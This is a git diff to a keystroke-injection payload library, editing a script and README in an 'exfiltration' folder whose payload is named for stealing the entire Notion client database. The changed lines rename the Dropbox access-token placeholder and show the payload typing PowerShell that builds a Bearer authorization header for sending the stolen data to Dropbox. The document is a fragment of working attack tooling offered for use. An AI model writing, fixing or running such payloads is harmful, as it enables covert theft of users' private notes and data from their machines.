diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md index f812d10..faf0d9f 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md @@ -19,7 +19,7 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no - You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. -`DEFINE DROPBOX_ACCESS_TOKEN "example"` +`DEFINE #DROPBOX_ACCESS_TOKEN "example"` ## Credits diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt index ecf8f91..8610368 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt @@ -15,7 +15,7 @@ REM - Internet Connection REM You must define your Dropbox accessToken or modify the exfiltration modality. -DEFINE DROPBOX_ACCESS_TOKEN example +DEFINE #DROPBOX_ACCESS_TOKEN example GUI r DELAY 1000 @@ -30,10 +30,7 @@ STRINGLN END_STRINGLN REM Setting about exfiltration -STRING $accessToken = " -STRING DROPBOX_ACCESS_TOKEN -STRING " -ENTER +STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN" STRINGLN $authHeader = @{Authorization = "Bearer $accessToken"}